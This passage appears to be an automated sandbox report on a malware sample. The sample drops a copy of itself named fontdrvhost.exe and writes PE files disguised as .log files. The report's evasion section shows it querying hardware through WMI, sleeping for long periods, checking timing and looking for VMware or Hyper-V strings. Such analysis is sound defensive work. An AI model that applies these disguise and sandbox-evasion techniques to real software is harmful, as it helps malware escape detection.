Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Memory allocated: 1280000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Memory allocated: 1B0B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: C00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1A840000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1B110000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1670000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1B180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1AEF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: E10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1AAB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1ACA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1AB90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1800000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1B4D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1ADF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: A20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1A750000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: B60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Memory allocated: 1A620000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD3600 rdtsc 0_2_00007FFD9BBD3600
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IsWIxvZJ.log
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tIxJOpqh.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XsyMwKeS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mJblSiJK.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dpYUmTzI.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OgxpbmIn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rudcNvNr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wsOrhbIJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hsmnhNDB.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZtZwWUdP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ORiFVhtH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CQeYyQPa.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zzDSBAiP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ikDUDecv.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WuogHSdp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YOQFKOOU.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe TID: 6644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7268 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 5004 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7180 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7532 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7396 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7880 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7788 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8124 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8012 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 3512 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 2520 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 6092 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 5728 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7320 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8048 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7552 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 4628 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 7284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe TID: 8080 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData\Local
Source: fontdrvhost.exe, 0000001B.00000002.1998188991.000000001B434000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
Source: ZT3pxe2Tb4.exe, 00000000.00000002.1670366434.000000001BF57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: fontdrvhost.exe, 0000001B.00000002.2002667605.000000001C11C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: fontdrvhost.exe, 00000033.00000002.2716698642.000000001C591000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\4
Source: fontdrvhost.exe, 00000023.00000002.2621783343.000000001B460000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: fontdrvhost.exe, 00000023.00000002.2663073446.000000001BA16000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: ZT3pxe2Tb4.exe, 00000000.00000002.1667261412.000000001B980000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: fontdrvhost.exe, 00000023.00000002.2621783343.000000001B517000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: fontdrvhost.exe, 00000022.00000002.2094701336.000000001C3C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWs%SystemRoot%\system32\mswsock.dll
Source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BFA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\DB-
Source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k'V
Source: fontdrvhost.exe, 0000001B.00000002.2004925843.000000001C16D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
